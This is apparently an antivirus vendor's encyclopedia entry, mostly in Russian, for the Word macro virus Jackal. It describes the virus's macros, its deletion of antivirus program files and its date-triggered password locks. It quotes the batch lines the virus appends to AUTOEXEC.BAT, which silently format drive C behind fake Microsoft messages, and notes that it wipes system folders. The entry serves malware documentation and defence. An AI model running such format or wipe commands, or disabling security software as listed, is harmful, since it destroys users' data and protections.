Searching
..

Click anywhere to stop

Virus.MSWord.Jackal

Класс Virus
Платформа MSWord
Описание

Technical Details

Содержит один модуль «Jackal», в котором содержится четырнадцать макросов:
AutoOpen, FileSaveAs, KillAV, Format, ToolsMacro, ViewVBCode,
FileTemplates, Organizer, EditFind, HelpAbout, ToolsCustomize,
ToolsOptions, Jackal, Ultras.
Заражение происходит при открытии и сохранении файла с другим именем.
Удаляет файлы, принадлежащие известным антивирусам:

C:Program FilesAntiViral Toolkit ProAvp32.exe
C:Program FilesAntiViral Toolkit Pro*.avc
C:Program FilesCommand SoftwareF-PROT95*.dll
C:Program FilesCommand SoftwareF-PROT95*.exe
C:Program FilesMcAfeeVirusScan95Scan.dat
C:Program FilesMcAfeeVirusScanScan.dat
C:Program FilesNorton AntiVirusViruscan.dat
C:Program FilesSymantecSymevnt.386
C:Program FilesFindVirusFindviru.drv
C:Program FilesCheyenneAntiVirus*.dll
C:Program FilesCheyenneCommonCshell.dll
C:PC-Cillin 95Lpt$vpn.*
C:PC-Cillin 95Scan32.dll
C:PC-Cillin 97Lpt$vpn.*
C:PC-Cillin 97Scan32.dll
C:eSafeProtect*.dll
C:f-macrof-macro.exe
C:TBAVW95Tbscan.sig
C:Tbavw95Tb*.*
C:VS95*.dll

По 1-м числам устанавливает на документы пароль «JACKAL». По 27 числам
устанавливает на документы пароль «ULTRAS». По 5, 9, 17, 25 числам и в мае
выдает Balloon:

Microsoft Office 97
Error, is necessary will update files

После чего в файл C:AUTOEXEC.BAT дописывает команды форматирования
винчестера:

@ECHO OFF
CLS
ECHO Microsoft Corp. 1983-1997 All rights reserved
ECHO Goes preparation to renovation of your system files
ECHO Please wait this can occupy several minutes
FORMAT C: /U /C /S /AUTOTEST > NUL
ECHO.
ECHO.
ECHO.
ECHO Error at renovations of files

По 15-м и 30-м числам стирает файлы:

C:*.*
C:Windows*.*
C:WindowsSystem*.*

Узнай статистику распространения угроз в твоем регионе